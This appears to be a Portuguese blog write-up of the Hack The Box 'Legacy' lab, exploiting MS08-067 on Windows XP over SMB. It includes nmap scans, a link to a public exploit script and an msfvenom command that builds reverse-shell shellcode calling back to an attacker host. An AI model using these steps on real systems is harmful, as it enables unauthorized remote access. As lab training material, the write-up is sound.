Legacy - HTB Write Up - CVE-2008-4250 - MS08-067 Exploit
CVE-2008-4250 - MS08-067 Exploit
Enumeração dos serviços no servidor Legacy
NMAP Geral
nmap -Pn -sV [IP]
O resultado mostra o serviço SMB na porta 445 habilitado, aleḿ do MSRPC e NETBIOS. Ao testar os serviços MSRPC e NETBIOS nenhum vetor é identificado. Então, o foco é o SMB.
Scan no serviço SMB com NMAP
nmap -p 445 -A [IP]
O S.O identificado é Windows XP. Em seguida, executo o nmap na categoria vuln e duas vulnerabilidades críticas são identificadas: MS17-010 conhecido como Eternal Blue e MS08-067 publicado na CVE-2008-4250
Mais um scan para validar o S.O antes de buscar por exploits.
nmap -p 445 --script=smb-os-discovery.nse [IP]
Os exploits para o Eternal Blue apresentaram erro de compatibilidade com o Python 3.10.7, então optei por testar a vulnerabilidade MS08-067 e encontrei o exploit no github https://github.com/jivoi/pentest/
O script disponível no JIVOI/PENTEST requer alteração do shellcode que pode ser gerado com o comando:
msfvenom -p windows/shell_reverse_tcp LHOST=[IP-LOCAL] LPORT=[LOCAL-PORT] EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f c -a x86 --platform windows
O shellcode gerado com o msfvenom substituí o shellcode pré-definido no script ms08-067.py
Depois da substituição, com o listening habilitado na máquina-atacante usando NCat, basta executar o script, conforme é mostrado abaixo.
A conexão reversa é estabelecida
Comando set para ver as variáveis de ambiente
Referências:
[+] Github JIVOI/PENTEST
[+] MS08-067 - Microsoft Security Bulletins
Comentários
Postar um comentário